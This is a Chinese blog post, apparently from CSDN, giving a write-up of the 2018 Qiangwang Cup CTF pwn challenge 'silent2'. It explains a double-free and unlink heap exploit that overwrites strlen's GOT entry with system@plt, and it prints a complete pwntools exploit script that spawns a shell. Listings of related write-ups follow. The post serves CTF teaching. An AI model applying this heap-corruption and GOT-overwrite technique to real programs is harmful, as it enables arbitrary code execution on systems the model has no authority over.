2018年强网杯之silent2

最新推荐文章于 2024-01-20 17:01:34 发布
原创 最新推荐文章于 2024-01-20 17:01:34 发布 · 742 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#unlink #double free #覆盖got表 #输入不存在溢出

本文详细分析了C++内存管理中double free和unlink漏洞的利用过程。通过Add和Free函数的行为,指出Free函数未清零指针可能导致double free。在Edit函数中,探讨了如何利用double free触发前向合并,进一步利用unlink漏洞实现任意地址写。最终通过构造EXP,展示了如何绕过unlink检查并覆写特定地址,以调用system函数达到控制程序流程的目的。

0x01分析行为

按照正常思路添加、编辑、释放

Add函数分配大小为16字节或大于0x7f字节的堆块,将堆地址放入0x6020c0的bss段内。

Free函数释放堆块,但是没有将指针清零,导致doublefree。

Edit函数修改堆块内容,修改长度不超过原来的长度。

0x02利用点

checksec检查发现可以对got表进行写,很自然联想到用system函数地址覆盖strlen_got_plt,这样当调用Edit函数的时候调用strlen即可完成system函数调用。

输入不存在溢出,但是free之后指针并没有清零,所以可以考虑申请一个大的堆块在里面伪造两个fake_chunk,通过double free触发前向合并,进而触发unlink漏洞实现任意地址写。

P->fd->bk = P->bk.
P->bk->fd = P->fd.
P就是fake_chunk1,可以看出fake_chunk1->fd->bk和fake_chunk1->bk->fd都指向fake_chunk1,所以只需要关注第二次操作即可。
P->fd即fake_chunk1->fd=p_addr-0x18,即0x6020C0。
所以unlink之后,P->bk->fd变为即0x6020C0。

将bss段上index[0],也就是0x6020c0的位置覆写为strlen_got_plt,对index[0]进行编辑,修改strlen_got_plt内容为system@plt,当再次执行Edit函数时调用system。

0x03EXP分析

create(str(0x90),'B'*0x80)    #3    low
create(str(0x90),'X'*0x80)    #4    high

块3绕过unlink检查,块4用来free触发前向合并。

payload=p64(0x0)+p64(0x91)
payload+=p64(0x6020c0)+p64(0x6020c8)   #addrress of No.0 and No.1
payload+='X'*0x70
payload+=p64(0x90)+p64(0xa0)

块3的prev_use位置1,块4的prev_use位置0,表示块3空闲,可以前向合并。块3的fd=0x6020c0(index[0]),bk=0x6020c8(index[1])。考虑unlink的第二步,最终将0x6020d8(index[3])内容覆写为0x6020c0(index[0])。

delete('4')        
r.writeline('3')       #edit
r.writeline('3')       #No.3
sleep(time_sleep)
r.write('\x20\x20\x60\x00\x00\x00\x00')     #strlen的got表地址

释放块4触发前向合并。再次edit(3)的时候已经是对0x6020c0的内容进行修改。

EXP

#!/usr/bin/env python
from pwn import *

host = '39.107.32.132'
port = 10001
#r = remote(host, port)
r= process('./silent2')
time_sleep = 1
context.terminal = ['gnome-terminal','-x','sh','-c']

def create(length, data):
    r.sendline('1')
    sleep(time_sleep)
    r.sendline(str(length))
    sleep(time_sleep)
    r.sendline(data)
    sleep(time_sleep)

def delete(index):
    r.sendline('2')
    sleep(time_sleep)
    r.sendline(str(index))
    sleep(time_sleep)

def edit(index, data):
    r.sendline('3')
    sleep(time_sleep)
    r.sendline(str(index))
    sleep(time_sleep)
    r.sendline(data)
    sleep(time_sleep)
    #r.sendline('T'*10)

print "start working"
create(str(0x90),'X'*0x80)   #0    build a chunk 
create(str(0x90),'A'*0x80)   #1
create(str(0x90),'/bin/sh\x00')   #2
create(str(0x90),'B'*0x80)    #3    low
create(str(0x90),'X'*0x80)    #4    high
create(str(0x90),'X'*0x80)    #5

delete('4')
delete('3')
payload=p64(0x0)+p64(0x91)
payload+=p64(0x6020c0)+p64(0x6020c8)   #addrress of No.0 and No.1
payload+='X'*0x70
payload+=p64(0x90)+p64(0xa0)
create(str(0x130),payload)     
delete('4')        
r.writeline('3')       #edit
r.writeline('3')       #No.3
sleep(time_sleep)
r.write('\x20\x20\x60\x00\x00\x00\x00')     #strlen的got表地址
sleep(time_sleep)
r.writeline('3')      #edit
r.writeline('0')      #No.0
r.writeline(p64(0x400730))     #system@plt
sleep(time_sleep)     #
r.writeline('3')      #edit
sleep(time_sleep)
r.writeline('2')      #'/bin/sh'
print "end working"
raw_input()
r.interactive() 
silent2


BUUCTF qwb2018_slient2
weixin_45966329的博客
03-06 265
BUUCTF qwb2018_slient2 1、该题在BUUCTF上的环境是2.27版本,所以相对来说更加的容易了 2、只需要利用double free 使用tcache attach攻击free函数的got的地址 3、然后在freegot中写入sysytem函数的plt地址 4、再free掉一个写入/bin/sh的chunk即可 from pwn import * context(os='linux', arch='amd64',log_level='debug') io=remote("nod
2018强网之opm
极目楚天舒的博客
04-26 1802
0x01程序分析程序开启了PIE,说明got和plt位置需要通过泄露得到。题目一共可以存放下标为0-9一共10个role,游全局变量0x202130存放。Add函数添加role的管理结构,并将该结构指针存放于全局变量0x2020e0中。输入“S”则调用print的函数指针显示role管理结构所指向的内容。Add函数,为每一个添加的role分配一个结构用于管理,并将该结构地址返回存放于全局变量0...
2018强网初赛 逆向题目 hide writeup (超详细)
风如激的博客
03-28 4059
这道题有壳,strings搜索是upx3.91。但是能用upx -d。只好手动脱壳了。难点在于本题目有反调试,有些函数能步过。首先研究壳。第一句call必须步入。Sub_44f1c5必须步入。 Sub_44F1C5中,0x44f214的rep指令把0x400000到0x44f248复制到0x800000位置。0x44f22c处,rbp是0x84efb5。这句话是start处的第二条指令。这里...
2018强网silent2
snowleopard_bin的博客
09-26 674
看了雪论坛里一位大佬的writeup,感到一丝迷茫,遂另起炉灶,提供另一种类似的做法,我多加了解释,应该会更加通俗易懂。 发现NX、Canary都开了,但Partial RELRO说明可以修改got,PIE说明没有地址随机化,就可以直接利用IDA中看到的地址,需要计算libc偏移了 先看main函数 case1:功能就是create啦 注意到*&s[8*i] = v...
强网 2018 opm
Bill
05-23 1222
强网 2018 opm 前言     这篇WP是强网过去了很久之后才出的, 参考的是极目楚天舒师傅的博客, 这位师傅是一位CTF老赛手, 最近复出.由于图片中能CTRL+F出文字, 本文章尽量避免使用图片, 除非必要. 程序运行 1. menu You were invited to beat one punch man! (...
zidongmen1.rar_silent2dd_verilog hdl_步进电机_步进电机控制_步进电机角度
07-15
这个名为"zidongmen1.rar_silent2dd_verilog hdl_步进电机_步进电机控制_步进电机角度"的压缩包文件,显然是关于步进电机控制的资源,特别提到了Silent2DD(可能是一个特定的驱动方案)以及Verilog HDL(硬件描述...
discuzUcenter设置.zip_Discuz_silent9pp_slideui2_ucenter
09-15
1. 安装与启用:首先,下载Silent9pp Slideui2的压缩包,然后通过Discuz! 后台的“插件”管理模块进行安装。启用插件后,系统会自动应用新界面风格。 2. 配置与定制:该插件提供了丰富的配置选项,允许管理员自定义...
克服传统电源EMC布局敏感性,Silent Switcher 2完美解决汽车EMI
01-13
汽车的创新 70%于汽车电子产品,电子产品成本占整车比例已经从上世纪70代的4%成长到现在的30%左右,随着自动驾驶和电动化的发展趋势演进,业界预期到2030该比例将可达到50%。  汽车电子系统比重的增加显著提高...
高功率单片式 Silent Switcher 2 稳压器 满足 CISPR 25 Class 5 EMI 限制要求并适合狭小的安放空间
01-19
随着汽车中电子系统数量的成倍增加,车内产生...Silent Switcher 2 稳压器系列可满足汽车制造商严格的 EMI 要求,同时拥有紧凑的尺寸以及集成化 MOSFET 和高电流能力。 已获的* Silent Switcher 技术在高频、高功率电
广西2018秋九级英语上册Module1WondersoftheworldUnit2TheGrandCanyonwasnotjustbig&Unit3Languageinuse作业新版外研版
08-05
2. **语法结构**:第一部分的练习题中涉及了根据首字母填空,这是对学生词汇拼写和语境理解能力的测试。例如,"s"对应的是"sun","b"对应的是"beside","s"对应的是"sign","c"对应的是"disappeared","s"对应的是...
2018强网部分writeup
snowleopard_bin的博客
09-20 2584
0x00 签到题 操作内容: 打开题目就看到flag FLAG值: flag{welcome_to_qwb} 0x01 Welcome 操作内容: |拿到一张图片:               放进Stegsolve中,一点点偏移图片,慢慢发现有字,offset到100时就能清楚看到 得到flag FLAG值: QWB{W3lc0me} 0x02 web签到 操作内容:...
强网2018_core
z1r0的博客
03-21 942
强网2018_core 具体可以看z1r0’s blog 题目拿到手就是一个tar包。解压 ➜ 2018强网-core tar -xvf core_give.tar give_to_player/ give_to_player/bzImage give_to_player/core.cpio give_to_player/start.sh give_to_player/vmlinux ➜ 2018强网-core ls core_give.tar give_to_player ➜ 2018强网
kernel ROP - 2018 强网 - core
qq_51687381的博客
05-09 285
初学kernel,做个笔记。 Kernel ROP - CTF Wiki wiki上有着详细的分析,这里只对一些wiki上没有讲到的做个笔记。 首先是对文件: 引用一句其他师傅的话:类比于libc中的pwn,感觉*.ko就是binary文件,vmlinux就是libc … 同的是保护机制是由如何启动决定的(start.sh 中修改)。 Rop大体思路: 栈上有Canary防护的话,需要先泄露出Canary,来促使Rop Rop具体思路是和Libc中的类似,利用一些寄存器进行传值 调用com
2018强网pwn题复现
qq_46441427的博客
08-31 291
silent 漏洞位置: free后没有给指针置空,edit也没有检查chunk是否free 利用思路: 利用uaf把chunk进入fastbin中,构造三个单链来写free_hook然后getshell
linux_kernal_pwn 2018 强网 - core
yongbaoii的博客
09-01 400
四个文件,vmlinux用提取了。 开了kaslr。 我们说内核的保护分四种,隔离、访问控制、异常检测、随机化。 随机化有两种,一个是kaslr,一个是fgkaslr。 在开启了 KASLR 的内核中,内核的代码段基地址等地址会整体偏移。 然后解压文件系统,看看init文件相关配置。 mkdir core cp core.cpio ./core cd core mv ./core.cpio core.cpio.gz #因为cpio是经过gzip压缩过的,必须更改名字,gunzip才认识 gu.
强网2018 pwn复现
weixin_30588729的博客
08-03 497
前言 本文对强网 中除了 2 个内核题以外的 6 个 pwn 题的利用方式进行记录。题目真心错 程序和 exp: https://gitee.com/hac425/blog_data/blob/master/qwb2018/ 正文 silent 漏洞 在 free 的时候指针没有清空,而且程序没有 检测指针是否已经被释放 double free, 后面的 编辑功能也没有检验指针是否已经被 fr...
强网-JustRe
40KO的博客
05-28 1864
Windows32位程序,无壳,编译器版本还算高。 主函数除了CFG有点诡异外,流程十分简单。 进入第一个check函数,可以看到大量SSE指令,前面一些基本的判断很好看,直接调试看结果 .text:00401682 060 movd xmm0, eax .text:00401686 060 pshufd xmm5,...
强网2023
最新发布
2202_75317918的博客
01-20 1549
当时看到这个题目 也是觉得易懂 并且可以解出来的但是数字实在是过大了兄弟题目意思是计算2^27的阶乘,并获取得到每一位数的数字之和,flag即为该数字的sha256编码2^27为134217728gmpy2包是支持大数运算的,故利用其fac方法进行尝试,在等待一段时间后可以得到对应的结果参考了其他师傅的wp得到运行结果为:4495662081然后利用一个在线工具进行sha256加密即可得到flag。
强网wp
Sentiment的博客
07-22 1160
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
第二届强网络安全挑战赛Writeup
"这篇资源是关于第二届强网全国络安全挑战赛的Writeup,涵盖了多个关卡的解题策略和技巧。" 在本次络安全挑战赛中,参赛者需要解决一系列络安全问题,这些问题涉及到图像隐写术、密码学、程序逆向工程以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值